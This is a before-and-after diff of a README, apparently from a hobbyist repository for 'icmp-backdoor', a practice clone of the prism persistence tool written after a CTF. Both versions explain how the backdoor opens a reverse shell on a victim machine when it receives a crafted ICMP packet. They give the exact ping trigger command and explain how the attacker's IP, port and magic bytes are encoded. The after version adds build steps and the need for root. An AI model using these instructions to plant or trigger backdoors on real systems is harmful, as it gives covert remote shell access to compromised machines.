README.md, before:

# icmp-backdoor

During the BSidesLV Pros vs. Joes CTF, it was revealed that the red
cell used a very similar tool to this known as prism to achieve
persistence in a few of our machines. I decided to write my own tool
similar to this for practice.

Prism: https://github.com/andreafabrizi/prism

The concept behind this tool is that it listens for specially crafted
ICMP packets, and if they match a certain criteria, it will spawn a
reverse shell to a specified host and port.

# Usage

Prism uses its own tool to send the packets. I opted for a "live off
the land" approach and use the commonly-available _ping_ utility with
the -p flag:

	$ ping -c 1 -p 0a0a001710002a7a host

The format for the pattern is: IIIIIIIIPPPPMMMM where I is IP address,
P is port, and M is magic bytes. This is represented as hexadecimal,
so you will either have to be a weirdo like me and be able to
calculate this in your head or use a calculator. I will add a shell
script to leverage this in the next few days.

In the above example:

	IP: 0a0a0017 is 10.10.0.23
	Port: 1000 is 4096
	Magic is 2a7a, which is hard-coded into this program.

This will open a reverse shell from the victim machine to 10.10.0.23:4096.

The magic bytes are there for alignment purposes when using the -p
flag with ping and as a mechanism to determine if a shell should be
opened when an ICMP packet is received.

Commit message:

added Building section and blurb about SOCK_RAW

README.md, after:

# icmp-backdoor

During the BSidesLV Pros vs. Joes CTF, it was revealed that the red
cell used a very similar tool to this known as prism to achieve
persistence in a few of our machines. I decided to write my own tool
similar to this for practice.

Prism: https://github.com/andreafabrizi/prism

The concept behind this tool is that it listens for specially crafted
ICMP packets, and if they match a certain criteria, it will spawn a
reverse shell to a specified host and port.

# Building

Just use _make_. This has currently been tested only on Linux. Will
test on BSD, macOS and others soon:

	$ make
	
If you don't have _make_ or if _gcc_ isn't your thing:

	$ clang -o icmp-backdoor icmp-backdoor.c

# Usage

Since this uses SOCK_RAW, you must run this as root or otherwise have
the ability to open raw sockets as the user that initially runs this.

Prism uses its own tool to send the packets. I opted for a "live off
the land" approach and use the commonly-available _ping_ utility with
the -p flag:

	$ ping -c 1 -p 0a0a001710002a7a host

The format for the pattern is: IIIIIIIIPPPPMMMM where I is IP address,
P is port, and M is magic bytes. This is represented as hexadecimal,
so you will either have to be a weirdo like me and be able to
calculate this in your head or use a calculator. I will add a shell
script to leverage this in the next few days.

In the above example:

	IP: 0a0a0017 is 10.10.0.23
	Port: 1000 is 4096
	Magic is 2a7a, which is hard-coded into this program.

This will open a reverse shell from the victim machine to 10.10.0.23:4096.

The magic bytes are there for alignment purposes when using the -p
flag with ping and as a mechanism to determine if a shell should be
opened when an ICMP packet is received.
